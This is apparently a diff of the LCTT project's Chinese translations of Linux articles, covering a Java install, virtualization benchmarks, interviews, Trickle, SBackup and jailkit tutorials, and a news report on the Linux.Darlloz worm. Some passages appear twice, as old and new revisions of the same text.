rsync netpbm libgvc5 libnetpbm10 libgraph4
Use 'apt-get autoremove' to remove them.
The following extra packages will be installed:
gsfonts-x11 java-common
Suggested packages:
default-jre equivs binfmt-support visualvm ttf-baekmuk ttf-unfonts
ttf-unfonts-core ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho
ttf-sazanami-mincho ttf-arphic-uming
The following NEW packages will be installed:
gsfonts-x11 java-common oracle-java7-installer
0 upgraded, 3 newly installed, 0 to remove and 196 not upgraded.
Need to get 88.5 kB of archives.
After this operation, 473 kB of additional disk space will be used.
Do you want to continue [Y/n]?
6. 输入代表Yes的**Y**以及回车键继续安装。
7. 在安装过程中,你需要同意条款才能继续。选择**OK**。
8. 然后选择**Yes**继续。
9. 现在请等待安装包的下载与自动安装:
10. 安装完成。你可以在终端上查看Java版本:
$ java -version
java version "1.7.0_45"
Java(TM) SE Runtime Environment (build 1.7.0_45-b18)
Java HotSpot(TM) 64-Bit Server VM (build 24.45-b08, mixed mode)
via: http://www.unixmen.com/install-oracle-java-7-elementary-os-luna-via-ppa/
译者:[whatever1992](https://github.com/whatever1992) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,76 @@
KVM,Xen与VirtualBox在Intel Haswell上的Linux虚拟化性能比较
现在我们做的是[Intel Haswell][1]的虚拟化基准测试。我们在Intel酷睿i7 4770K的“Haswell”处理器上使用搭载了最新软件组件的Fedora 19,来进行KVM,Xen和VirtualBox的基准测试。
自从上个月推出Haswell以来,我们已经发布了许多和这款全新的英特尔处理器相关的基准测试,但我们直到这篇文章发布前,一直没有涵盖虚拟化方面的性能测试。这里,启用了英特尔硬件虚拟化后,将在一个纯净的Fedora 19 的64位操作系统上,分别安装KVM,Xen和Virtualbox,并进行比较。
目前Fedora 19拥有搭载GCC 4.8.1的Linux 3.9.8版本内核,Mesa 9.2.0开发库和一个EXT4文件系统。所有的虚拟化组件都从Fedora 19的仓库中获取的,包括QEMU 1.4.2,Xen 4.2.2和libvirt/virt-manager组件。Xen和KVM的虚拟化通过virt-manager来建立。VirtualBox 4.2.16则是通过VirtualBox.org获取并安装在Fedora 19中。
这个英特尔酷睿i7 4770K机器拥有16GB的内存和240GB的OCZ Vertex 3 固态硬盘。在测试中,每一个虚拟机能够使用全部八个逻辑核心(四个物理核心加上超线程)、16GB内存中的12GB以及16GB的虚拟磁盘。
在采用英特尔酷睿i7 “Haswell”处理器的Linux 3.9版本内核的Fedora 19上安装的KVM,Xen和VirtualBox的性能也和在没有任何形式的虚拟化或其它抽象层上运行基准测试的“裸机(Bare Metal)”的性能进行了对比。VMWare的产品没有在这篇文章里被测试,因为它们的EULA特性限制了这种公开基准测试(尽管VMware在过去可以让我们正常地做这样的基准测试),并且它们的试用软件只能限制运行在四核CPU上。但以后的另外一篇文章会比较下在其它硬件上XEN/KVM/VMware的性能。
全部的Linux虚拟化基准测试采用完全自动化和可重复的方式进行处理,使用开源软件[Phoronix Test Suite][3]并由[OpenBenchmarking.org][4]支持。在使用虚拟磁盘而且Xen/KVM都没有一个可靠的访问主机驱动或GPU的方法以使用3D功能的情况下,这篇文章里的大部分基准测试都是集中在不同Linux虚拟化方法计算性能开销上。
磁盘测试在这里并不是虚拟化测试的一个重点,因为只有一个虚拟磁盘被主机的文件系统使用。然而,当把这三种Linux虚拟化方法与裸机结果进行比较时,运行在Linux 3.9内核上的KVM性能最好,其次是Xen。Oracle的Virtual仅仅跑出了主机上PostMark邮件服务器性能的66%,而KVM跑出了性能的96%,Xen是83%。
当John The Ripper这个破解密码的程序在VirtualBox中运行时,则直接崩溃了。
运行TTSIOD渲染器时,在Linux 3.9 内核的Fedora 19上运行的Xen虚拟化方法获得了它的第一次性能比拼的胜利。
总之,运行在搭载英特尔酷睿i7 4770K处理器Fedora 19上的Xen和KVM虚拟化技术工作良好。这些虚拟化方法在Haswell处理器上的性能开销是最小的。当Xen和KVM在这款全新的英特尔处理器上运行良好的时候,Oracle的VirtualBox(最新版本,v4.2.16)相对慢得多。虽然VirtualBox的一个优点是支持客户机3D加速,但这会在未来的一篇Phoronix文章中再次进行测试。而把Haswell和前几代的英特尔处理器和AMD处理器比较不同虚拟化方法的性能开销也会在不久之后在Phoronix上进行测试。
via: http://www.phoronix.com/scan.php?page=article&item=intel_haswell_virtualization
译者:[KayGuoWhu](http://github.com/KayGuoWhu) 校对:[wxy](https://github.com/wxy)
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published/Interview with Ding Zhou of Ubuntu Tweak.md
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published/Interview with Ding Zhou of Ubuntu Tweak.md
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专访Ubuntu Tweak的作者周鼎
[Ubuntu tweak][1] 是一款知名度很高的应用程序软件,Ubuntu 用户可以用它来调整系统的性能、功能等各个细节。项目的创始人,周鼎又名 Tualatrix Chou ,正与我们分享 Ubuntu Tweak 的特性、使用感觉以及它跟 Canonical 的关系,并且勾勒了项目的未来计划蓝图。享受吧!
**你什么时候开始使用 Linux 的,并基于什么使你决定开发 Ubuntu tweak ?**
我开始使用 Linux 是在2006年底,那时刚开始我的大学生活。当时我正在学 C 编程语言,一个朋友建议说要学习编程的话 Linux 是最好的平台环境,所以我就开始了我的 Linux 生涯,是从 Fedora Core 6 开始的。但用了仅仅只有一周的时间,我就换成 Ubuntu 6.10,因为Ubuntu在中国有更好的社区,也有更好更快的源库/镜像。我立马就爱上了 Ubuntu,就一周时间,就从 Windows 环境完全切换到 Ubuntu 环境。
在苦乐参半的半年使用时间后,我意识到 Ubuntu 对中国用户来说不是太友好,因为全新安装系统后,用户必须得自己配置字体、输入法以及其它很多很多设置。所以,我决定开发出一款应用程序来帮助新手,让他们很简单的就可以对系统做相应配置。
因此在2007年7月,我就开始开发 Ubuntu Tweak,刚开始的时候,仅仅提供了汉语版本的,但很快就考虑了 Ubuntu Tweak 的国际版本,并且在2007年9月份就发布了首个国际版本。
**Ubuntu tweak 已经是非常成功的项目了。很多 Ubuntu 用户用它来调整系统的性能、功能等各个细节。能给我们谈论下 Ubuntu Tweak 能做些什么吗?**
Ubuntu Tweak 可以用来切换桌面图标的显示方式、设置字体、启用/禁用多用户切换功能以及登陆的标识(logo)等等。
在最新的 Ubuntu Tweak 0.6版本中,你也可以调整你的 Unity 桌面以及关机功能。
你也能使用 Ubuntu Tweak 来清理系统的垃圾以释放空间和使系统保持干净。
**Canonical 在他们的默认发布源中不考虑加入 Ubuntu Tweak。这意味着什么?这对那些没有经验,但又想要使用你的应用程序来调整他们的系统的用户来说,存在某些风险吗?**
对的。因为在以前的 Ubuntu Tweak 发布版本中,为流行的 PPA 都提供了可用源,但我不能保证所有的 PPA 都是安全的,所以 Ubuntu Tweak 会有一些安全风险。
如你们所见,从0.6版本后 Ubuntu Tweak 就已经移除了源中心(Source Center)。但请不要混淆“Ubuntu默认包含”和“加入源仓库”这两个概念。Ubuntu Tweak 首先应该要被加入通用资源仓库,然后才能被 Ubuntu 默认包含。
从错误报告和用户反馈来看,Ubuntu Tweak 已经比老版本更加稳定及更易使用。
**你有收到来自 Canonical 和 Ubuntu 开发者的支持或有跟他们合作(不论什么)的事项吗,是哪些方面的?**
当然,我得到 Canonical 公司的一些帮助,他们试着帮我把 Ubuntu Tweak 放入源仓库。这工作现在仍然在进行。
**开发 Ubuntu Tweak 的有多少人?**
如果你说的是“代码开发者”,就仅仅我一个,但我们有很多设计人员:logo 是M.Sharp设计的,Kevin Chou 帮助设计了 Ubuntu Tweak 的用户界面(UI)原型,就是0.6版本的样子。现在 Jeonkwan Chan 正在帮我重新美化用户界面,将会用在0.7版本上。任何人,只要愿意就可以加入到 Ubuntu Tweak 的开发中来:)
**在Ubuntu11.04版本中当 Unity 出现时,许多 Ubuntu 用户抱怨其可配置性不好,您对这个怎么看的?这个特殊的桌面环境能有些什么多适用性的配置能力呢?**
我喜欢桌面系统的可配置高适应性,这是 Linux 系统的优点,不是吗?
例如,我不喜欢 Unity Launcher 的自动隐藏功能,所以我设置让他不会隐藏。
事实上,Unity 是可配置的,仅仅是它缺少 CompizConfig 设置管理器,所以你不能把 Unity Launcher 放到桌面底部或右面,这对左撇子来说很不友好。哈哈,开玩笑的。
如大家所见,Ubuntu 12.04已经增加了隐藏/显示切换功能,Launcher 的大小在系统设置中也可以自定义设置。我认为 Unity 将会有更多的可配置功能。
**一般来说,你认为 Canonical 公司开发 Unity 桌面环境是正确的决策吗?他们与 Gnome 开发者之间有合作争议,这有些是不可避免的吗?**
是的,对于 Canonical 公司来说,我觉得他们的决策很正确。回顾三年前,当 Ubuntu 首次引入基于 GNOME Panel 的Indicator ,它的设计就要比原来直接的 GNOME Panel 小程序更优雅。但 Canonical 开发者和 GNOME 开发者之间合作有些问题,因为他们从来没有着眼于 GNOME。直到 GNOME 3 的面世,情况才有所好转,它的 GNOME Shell 已经从 GNOME Panel 移出来了,并且 GNOME Shell 的面板已经和上面提到的 Indicator 用的是同一套设计方式。如果他们之间共用相同的 API 的话,桌面Linux应该会更好用。
所以来自于公司、社区、GNOME 桌面等的不同的关于用户界面的见解,综合起来最终就形成了 Unity。
我认为这是好事。至少,到目前为至,比起 GNOME Shell 来说,我更喜欢 Unity。
**虽然你正在开发的是一款 Ubuntu 系统专用的程序,但我假设你为了使用更多的高级用户功能,会使用其它的发行版本。你会选择哪些发行版本呢?为什么?**
当然,我已经玩过 Fedora、Arch、 OpenSUSE,特别是 Gentoo,我已经整整使用了一年。它是我第二喜欢的 Linux 发行系统,因为它拥有一个最先进的包管理系统。
但现在我仅仅只使用 Ubuntu 的桌面版本和服务版,也使用 Mac OS X,很多的设计灵感就来自于它 :)
**Ubuntu Tweak 能被优化或做几个分支或者改变一点点,以便能在其它的 linux 发行版本比如 Fedora、OpenSue 或者 Debian 上使用吗?有做成统一的一个叫做“Linux Tweak”的应用程序,用户不管选择什么样的发布版本或桌面环境都可以用这种想法吗?不知道是否可行?**
可以的,要让 Ubuntu Tweak 在其它发行版本中运行非常容易。它是模块化的,很轻松的就可以改造(hack)。
2008年的时候,我就发布了一版 Fedora 的“Ubuntu Tweak for Fedora”,但最终我放弃维护这个版本了,因为我主要关注 Ubuntu 版本的,所以没有那么多精力。
**那 Ubuntu Tweak 的未来计划是什么?也许 Canonical 公司会内嵌进系统,然后把它做为发布版本默认的工具或者他们会基于他们自己的系统调整工具来使用它。您认为呢?您的下一步计划会是什么的呢?**
Ubuntu Tweak 的未来当然会一片光明。哈哈。
我已经开始实现把 Ubuntu Tweak 加入软件中心这个工作了。如果用户能从软件中心直接安装 Ubuntu Tweak,它会更容易。
现在我正在开发0.7版本的,它将更美观,并且与 Unity 桌面的集成度更好,也加入了一些很有用的新功能。我想使Ubuntu Tweak 在 Unity 桌面环境下尽可能的发挥作用。
跟随着 Ubuntu 12.04的发布,我也计划发布新的版本,希望大家喜欢 :)
还有一件事要透露下,我已经加入 Canonical 北京公司,负责处理 OEM 的事情。虽然 Ubuntu Tweak 仍是一个个人项目,我还没有参与进 Ubuntu 的开发任务,但有可能话我会试着加入开发团队 :)
**太伟大了!谢谢 Tualatrix。**
via: http://www.unixmen.com/interview-with-ding-zhou-of-ubuntu-tweak/
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译者:[runningwater](https://github.com/runningwater) 校对:[wxy](https://github.com/wxy)
published/KDE vs GNOME- Settings, Apps, Widgets.md
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published/KDE vs GNOME- Settings, Apps, Widgets.md
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@ -0,0 +1,81 @@
KDE vs GNOME: 设置,应用和小工具
第一次加载进入Gnome 3,如果你来自另一个平台,它的桌面可能被认为是很奇怪的。像经典的Gnome一样,你想访问的文档和工具并不位于屏幕的底部。让新手们感到更陌生的是,关闭已经打开的窗口的方法是如此的“与众不同”。然而,站在支持Gnome3的角度上,我发现只要你习惯了这种新的做事方式,会觉得这是一段相当愉快的经历。我所知道的已经试用过Gnome3的新用户们也普遍地感觉良好。
使用KDE,你可以通过设置去控制几乎桌面的每一个方面。一些诸如[OpenSUSE][1]Linux发行版,通过紧密地把它们的工具 ([YaST][2]) 集成到KDE的设置环境中,在这方面做得更好。
但是KDE倾向于为应用程序提供更细粒度的控制。我最喜欢的例子之一是[Kontact][3] vs [Evolution][4]。它们分别是Gnome和KDE上很强大的个人信息管理软件。但不同的是,Kontact是一套附带为每个应用程序绑定一套控制的应用程序,而Evolution只是拥有有限控制的单个应用程序。在其它特定于桌面的应用中,[AmaroK][5] vs [Rhythmbox][6] 也是如此。
当涉及到为你的桌面寻找合适的文件管理器时,Gnome和KDE提供的默认选择都能为你完成这项工作。[Nautilus][7]是Gnome的默认文件管理器,而KDE提供[Dolphin][8] 作为它的默认文件管理器。
在另一方面,也有一些有价值的地方来支持KDE。[Calligra][9] 对比 [AbiWord][10] 对于KDE来说是轻松取胜的,因为[LibreOffice][11] 并不是一个“真正的”Gnome特有的应用。因为它是很多Linux发行版的默认套件,而不是桌面环境的默认选择。
via: http://www.datamation.com/open-source/kde-vs-gnome-settings-apps-widgets-1.html
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译者:[KayGuoWhu](https://github.com/KayGuoWhu) 校对:[wxy](https://github.com/wxy)
@ -0,0 +1,86 @@
在对Linux基金会执行官,Jim Zemlin 的采访中,VentureBeat 展望了2014年开源操作系统的未来。
Zemlin 为我们解释了 GNU/Linux 为什么以及如何使它成为内心有些担忧的消费者的最安全的选择。还有就是为什么选择GNU/Linux作为能源汽车、手机、TV以及其它新兴设备的操作系统。
**VentureBeat: 安全和隐私一直是本年度最热门的话题,我们听到的谣言,Linus[Torvalds, Linux 创始人]对政府部门是否有植入后门的要求点头称是。**
**Zemlin**: 如果Linux真有后门,你应该知道的。
**VentureBeat: Linux基金会如何保证Linux用户的隐私和自由,使其免于遭受追踪和监视?**
**Zemlin**: 对此,我们一以贯之。向内核插入违反隐私权和背离自由精神的代码而不被成千上万的开发者注意到,这是很难的。Linux的本性就是自我定制。
**VentureBeat: 今年的隐私/安全/监视事件会不会促使, 或者将会促使更多的消费者倾向于Linux,对此你作何感想?**
**Zemlin**: 世界范围内,我听到人们都在说,“用开源保证隐私是必须的。”的确,那会促使更多的使用者选择Linux。
除了他们对linux平台下的隐私和安全持自信、信任的态度以外, 我认为消费者会基于多种原因选择Linux。
[视频游戏发行商] Valve [及其SteamOS下的工作][1] 正在促使更多的消费者走进Linux,就像逐渐占据主导地位的Android和其他运行Linux的电子设备一样,比如电视、家电、汽车等,当然还有更多。
**VentureBeat: 针对手机的Ubuntu Edge, 对它有何看法? 对于2014-2015年Linux/Ubuntu手机市场走势,你作何预测?**
我认为预测基于Linux的手机将占据主导地位,不算夸大事实。Android, Tizen, Ubuntu, Firefox,等等等等,都显示出Linux可以驱动手机市场的创新,并且为消费者创造新的体验,为开发者和OEMs创造机会。
**VentureBeat: 目前为止,你看到的linux嵌入式车载系统的最令人激动的使用案例是什么?**
**Zemlin**: 毫无疑问,就是,Cadillac, Tesla, Toyota, Jaguar, Land Rover等都搭建了车载信息娱乐系统。
比如,今年赢得了 “年度汽车族”奖项的Tesla Model S,装备了一个17英寸平面、运行着定制Linux的电脑。这真的是太酷了。
2014年度汽车族刚刚揭晓 -- Cadillac CTS sedan, 也是使用linux作为车载信息娱乐系统。汽车制造商有能力使用linux进行创新并区别使用这些系统。
**VentureBeat: 在硬核开发者市场以外,Linux是如何发展壮大的,尤其是考虑到消费者和游戏玩家?**
**Zemlin**:可以肯定的是,对游戏玩家来说,今年确实是linux的一个转折点。Valve, 一个基于Steam网络平台的一个游戏厂商,在linux上构建并运行所有的源代码和动画。Valve的CEO Gabe Newell 称,今年的LinuxCon大会上他们在linux平台运行了198个游戏,随着引进基于linux的Steam,这个数字还会上升。这是Linux和游戏界新趋势的开端。
用户每天都在用linux。软件支撑着我们的日常生活。像Google,Facebook还有Twitter等公司,都建立在Linux和开源软件之上。去年10月份LinuxCon欧洲大会上,来自Twitter的Chris Aniszczyk告诉听众:
“Twitter 理所当然完全运行在linux上。为什么你们还需要其他的东西?”(译注:言外之意就是有linux就够了,不需要别的什么东西了。)
如今Linux驱动着130万台日常所用Android手机,每天近60万基于linux的新电视售出。新的家电以及汽车都建立在linux之上。主要交通系统也都在使用linux。最受欢迎的[GoPro 使用linux和开源软件][2]。这样的例子层出不穷。
敬请关注 - 未来你将看到更多实例,展现了Linux和开源软件,以及协同开发在日常生活中发挥越来越大的作用。
**VentureBeat: 在你看来,到2014年,免费和开源软件最大的机遇会是什么?**
**Zemlin**: 我们已经谈到游戏和电子设备,但是企业将会继续为linux呈现更多的机会。云计算的兴起为开发者带来新的机遇和挑战。你可以试着去找找不运行在linux上的公共云。
via: http://venturebeat.com/2013/11/26/linux-chief-open-source-is-safer-and-linux-is-more-secure-than-any-other-os-exclusive/
译者:[l3b2w1](https://github.com/l3b2w1) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -1,18 +1,17 @@
Linux 下使用Trickle管理和限制下载/上传带宽
Linux 下使用Trickle限制下载/上传带宽
### Trickle 是什么? ###
**Trickle**是一款带宽整形器,用来限制如**Firefox, FTP , SSH**以及其他使用网络带宽的程序的带宽使用。你希望你的**Youtube**音乐体验影响到你的ftp下载么?如果不想,请继续阅读这篇文章,学习如何在你的机器上安装和使用trickle。
**Trickle**是一款带宽控制供给,用来限制如**Firefox, FTP , SSH**以及其他使用网络带宽的程序的带宽。你希望你的**Youtube**音乐体验影响到你的ftp下载么?如果不想,请继续阅读这篇文章,学习如何在你的机器上安装和使用trickle。
### 怎样在Linux上安装Trickle ###
trickle工具有它自己的依赖包,安装和使用trickle之前必须安装“**libevent 库**”,不过这个库在大多数现在的Linux机器上已经默认安装。
trickle工具有一些依赖包,安装和使用trickle之前必须安装“**libevent 库**”,不过这个库在大多数现在的Linux机器上已经默认安装。
#### 在 Debian/Ubuntu/Linux Mint 上####
@ -32,8 +31,7 @@ trickle工具有它自己的依赖包,安装和使用trickle之前必须安装
### Trickle不能做什么? ###
@ -41,7 +39,6 @@ Trickle不能用于限制使用**UDP**协议的应用的带宽,它只可用于
### 确定Trickle是否可运行在某个特定应用上 ###
@ -65,14 +62,14 @@ Trickle不能用于限制使用**UDP**协议的应用的带宽,它只可用于
### 学习如何使用Trickle ###
root@oltjano-X55CR:~# trickle -V
trickle: version 1.07
Linux有很多命令行工具使测试(实验)变得有趣和美丽。下面的命令使用[wget 工具][1]来下载最新的Pear OS镜像.
root@oltjano-X55CR:~# wget http://sourceforge.net/projects/pearoslinux/files/Pear%20OS%208/pearos8-i386.iso/download
root@oltjano-X55CR:~# wget http://sourceforge.net/projects/pearoslinux/files/Pear%20OS%208/pearos8-i386.iso/download
--2013-11-20 11:56:32-- http://sourceforge.net/projects/pearoslinux/files/Pear%20OS%208/pearos8-i386.iso/download
Resolving sourceforge.net (sourceforge.net)...
@ -93,8 +90,6 @@ root@oltjano-X55CR:~# wget http://sourceforge.net/projects/pearoslinux/files/Pea
0% [ ] 30,78,278 381KB/s eta 1h 50m
从输出可以看到,下载速度大约是**381 KB/s**。我想限制下载速度到**13 K/s**,这样我就可以用我的带宽做其他的事情了。下面的命令用来限制wget速度到**13 K/s**。
root@oltjano-X55CR:~# trickle -d 13 wget http://sourceforge.net/projects/pearoslinux/files/Pear%20OS%208/pearos8-i386.iso/download
ravisaive@ravisaive-OptiPlex-380:~$ trickle -d 13 wget http://sourceforge.net/projects/pearoslinux/files/Pear%20OS%208/pearos8-i386.iso/download
@ -117,7 +112,7 @@ root@oltjano-X55CR:~# wget http://sourceforge.net/projects/pearoslinux/files/Pea
0% [ ] 2,01,550 13.1KB/s eta 21h 5m
从输出可以看到,下载速度被限制到了**13K/s**。下载将会持续**21小时5分钟**。上面的“**-d**”选项表示下载,还可以结合使用 “**-d**”选项和上传选项(**-u**),如下例所示。
从输出可以看到,下载速度被限制到了**13K/s**。下载将会持续**21小时5分钟**。上面的“**-d**”选项表示下载,还可以结合使用 “**-d**”选项和上传选项(**-u**),如下例所示。
# trickle -u 100 -d 50 ftp
@ -127,7 +122,7 @@ root@oltjano-X55CR:~# wget http://sourceforge.net/projects/pearoslinux/files/Pea
每个命令行工具都对用户提供了帮助,使用"trickle -h"命令来找出更多trickle工具的用法。
root@oltjano-X55CR:/usr/bin# trickle -h
root@oltjano-X55CR:/usr/bin# trickle -h
Usage: trickle [-hvVs] [-d <rate>] [-u <rate>] [-w <length>] [-t <seconds>]
[-l <length>] [-n <path>] command ...
@ -11,6 +11,7 @@
via: http://www.unixmen.com/play-crossword-game-adobes-leaked-passwords/
@ -62,19 +62,19 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以
### General ###
#### General选项卡 ####
在 General 选项内,你可以选择多久进行一次完整备份,默认是7天。每7天 SBackup 将会进行一次完整的备份。你也可以选择备份的压缩格式。
### Include ###
#### Include选项卡 ####
这个选项不需要解释太多,你可以添加 SBackup 要备份的文件或目录。这里可以选择备份单独的文件或者完整的目录,我删除了所有的目录仅仅保留了“Resume”
### Exclude ###
#### Exclude选项卡 ####
如同 Include 选项,我们可以选择备份时排除的文档和目录,只需要选择要排除的文档和目录的路径即可。在默认配置下,/media, /var/run/, /var/cache/, /var/spool/ 和 /vat/tmp/ 目录均被排除
@ -92,7 +92,7 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以
### Destination ###
#### Destination选项卡 ####
在这里你可以选择备份存放的路径,正如我之前提到的,你可以把备份的文档或文件夹存放在硬盘或者远程的 FTP 或 NAS。这里我将把备份保存在 /home/sk/My Backup 目录下。
@ -100,7 +100,7 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以
**提示:** 在备份前确认目录有足够的空间保存备份文件
### Schedule ###
#### Schedule选项卡 ####
在这个选项中,你可以设定具体的备份时间。点击 **Simple** 选项,可以按每小时、每日、每周、每月来设置你的计划备份时间。
@ -114,13 +114,13 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以
lrwxrwxrwx 1 root root 33 Nov 8 15:34 /etc/cron.daily/sbackup -> /usr/share/sbackup/sbackup-launch
### Purging ###
#### Purging选项卡 ####
### Report ###
#### Report选项卡 ####
Report 是最后一个选项卡,在这里你可以设置接收备份完成通知的邮箱。输入你的邮箱ID、SMTP服务地址、邮箱用户名、密码后,点击 Test mail settings。需要留意的是,在测试邮箱设置前,点击工具栏中的Save Configuration按钮保存你的配置。
published/Setup a jailed shell with jailkit on ubuntu.md
Normal file
published/Setup a jailed shell with jailkit on ubuntu.md
Normal file
@ -0,0 +1,240 @@
### Jailkit和jailed Shell ###
受限shell(Jailed Shell)是一类被限制的shell,它看起来非常像真实的Shell,但是它不允许查看和修改真实的文件系统的任何部分。Shell内的文件系统不同于底层的文件系统。这种功能是通过chroot和其他多种程序实现的。举例来说,给用户建立一个linux shell去让他“玩玩”,或者在一个限定的环境里运行一些程序的所有功能等等。
Jailkit 从这里下载:[http://olivier.sessink.nl/jailkit/][1]
###在Ubuntu/Debian 上安装 jailkit ###
1. 因为jaikit需要在系统上编译,首先,我们需要有用于编译的那些工具。所以,安装如下包:
$ sudo apt-get install build-essential autoconf automake libtool flex bison debhelper binutils-gold
2. 从下述URL下载Jailkit,或者访问它的网站以下载最新版本的,如果有了更新版本的话。http://olivier.sessink.nl/jailkit/jailkit-2.16.tar.gz
$ wget http://olivier.sessink.nl/jailkit/jailkit-2.16.tar.gz
3. 解压
$ tar -vxzf jailkit-2.16.tar.gz
4. 编译并创建deb软件包
$ cd jailkit-2.16/
$ sudo ./debian/rules binary
5. 安装deb软件包
上述命令创建的deb软件包叫做: jailkit_2.16-1_amd64.deb.
$ cd ..
$ sudo dpkg -i jailkit_2.16-1_amd64.deb
$ jk_
jk_addjailuser jk_chrootlaunch jk_cp jk_jailuser jk_lsh jk_uchroot
jk_check jk_chrootsh jk_init jk_list jk_socketd jk_update
### 配置Jailed Shell ###
1. 配置受限环境
$ sudo mkdir /opt/jail
$ sudo chown root:root /opt/jail
2. 设置在受限环境中可用的程序
$ sudo jk_init -v /jail basicshell
$ sudo jk_init -v /jail editors
$ sudo jk_init -v /jail extendedshell
$ sudo jk_init -v /jail netutils
$ sudo jk_init -v /jail ssh
$ sudo jk_init -v /jail sftp
$ sudo jk_init -v /jail jk_lsh
$ sudo jk_init -v /opt/jail netutils basicshell jk_lsh openvpn ssh sftp
像basicshell, editors, netutils是一些组名,其中包含多个程序。复制到jail shell中的每个组都是可执行文件、库文件等的集合。比如**basicshell**就在jail提供有bash, ls, cat, chmod, mkdir, cp, cpio, date, dd, echo, egrep等程序。
> jk_lsh (Jailkit limited shell) - 这是一个重要的部分,必须添加到受限环境中。
3. 创建将被监禁的用户
$ sudo adduser robber
Adding user `robber' ...
Adding new group `robber' (1005) ...
Adding new user `robber' (1006) with group `robber' ...
Creating home directory `/home/robber' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for robber
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
4. 限制用户
$ sudo jk_jailuser -m -j /opt/jail/ robber
注意:最后两部分表明用户主目录和shell类型已经被改变了。现在用户的主目录在/opt/jail(受限环境)中。用户的Shell是一个名叫jk_chrootsh的特殊程序,会提供Jailed Shell。
$ ssh robber@localhost
robber@localhost's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com/
13 packages can be updated.
0 updates are security updates.
*** /dev/sda7 will be checked for errors at next reboot ***
*** /dev/sda8 will be checked for errors at next reboot ***
Last login: Sat Jun 23 12:45:13 2012 from localhost
Connection to localhost closed.
5. 给在jail中的用户Bash Shell
下个重要的事情是给用户在限制环境中的一个正确的bash shell。
6. 登入限制环境
$ ssh robber@localhost
robber@localhost's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com/
13 packages can be updated.
0 updates are security updates.
*** /dev/sda7 will be checked for errors at next reboot ***
*** /dev/sda8 will be checked for errors at next reboot ***
Last login: Sat Jun 23 12:46:01 2012 from localhost
bash: groups: command not found
I have no name!@desktop:~$
受限环境说'I have no name!',哈哈。现在我们在受限环境中有了个完整功能的bash shell。
I have no name!@desktop:~$ cd /
I have no name!@desktop:/$ ls
bin dev etc home lib lib64 run usr var
I have no name!@desktop:/$
$ wget http://www.google.com/
$ wget http://www.google.com/
--2012-06-23 12:56:43-- http://www.google.com/
Resolving www.google.com (www.google.com)... failed: Name or service not known.
wget: unable to resolve host address `www.google.com'
$ sudo jk_cp -v -j /opt/jail /lib/x86_64-linux-gnu/libnss_files.so.2
$ sudo jk_cp -v -j /opt/jail /lib/x86_64-linux-gnu/libnss_dns.so.2
### 在限制环境中运行程序或服务 ###
$ sudo jk_chrootlaunch -j /opt/jail -u robber -x /some/command/in/jail
> jk_cp - 将文件包括权限信息和库文件复制到jail的工具
via: http://www.binarytides.com/install-jailkit-ubuntu-debian/
via: http://www.binarytides.com/setup-jailed-shell-jailkit-ubuntu/
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,25 @@
Briquolo 0.5.7可以通过Ubuntu软件中心(Ubuntu 12.04, Ubuntu 12.04, Ubuntu 13.04, Ubuntu 13.10, Ubuntu 14.04)[免费安装][2]。
via: http://iloveubuntu.net/test-your-reflexes-briquolo-fast-breakout-game
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[Mr小眼儿](http://blog.csdn.net/tinyeyeser)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,12 +1,13 @@
新蠕虫能感染 Linux 系统和嵌入式设备!
**来自𧶼门铁克研究员的消息,这个病毒通过2012年出现的 PHP 漏洞传播**
**来自赛门铁克研究员的消息,这个病毒通过2012年出现的 PHP 漏洞传播**
据美国国际数据集团(IDG)的新闻 —— 一个新的蠕虫病毒将目标指向那些运行了 Linux 和 PHP 的 x86 架构计算机,其变种还会对运行在其他芯片架构上的设备(诸如家用路由器和机顶盒)造成威胁。
根据𧶼门铁克研究员的介绍,这种病毒利用 php-cgi 上的一个漏洞进行传播,这个 php-cgi 组件的功能是允许 PHP 代码在通用网关接口(CGI)的配置环境下被执行。此漏洞的代号为 CVE-2012-1823(通过这个漏洞,攻击者可以远程执行任意代码,所以这个漏洞又叫“程任意代码执行漏洞” —— 译者注)。2012年5月份,PHP 5.4.3 和 PHP 5.3.13 这两个版本被打上补丁,修复了这个漏洞。
根据赛门铁克研究员的介绍,这种病毒利用 php-cgi 上的一个漏洞进行传播,这个 php-cgi 组件的功能是允许 PHP 代码在通用网关接口(CGI)的配置环境下被执行。此漏洞的代号为 CVE-2012-1823(通过这个漏洞,攻击者可以远程执行任意代码,所以这种漏洞又叫“远程任意代码执行漏洞” —— 译者注)。2012年5月份,PHP 5.4.3 和 PHP 5.3.13 这两个版本已经打上补丁修复了这个漏洞。
这个𧶼门铁克的研究员在[博客][1]中写道:这个名为“Linux.Darlloz”的新蠕虫病毒基于去年10月份放出的 PoC 代码(PoC:proof of concept,概念验证。利用目标计算机的漏洞,为对其进行攻击而设计的代码称为 exploit,而一个没有充分利用漏洞的 exploit,就是 PoC —— 译者注)。
这个赛门铁克的研究员在[博客][1]中写道:这个名为“Linux.Darlloz”的新蠕虫病毒基于去年10月份放出的 PoC 代码(PoC:proof of concept,概念验证。利用目标计算机的漏洞,为对其进行攻击而设计的代码称为 exploit,而一个没有充分利用漏洞的 exploit,就是 PoC —— 译者注)。
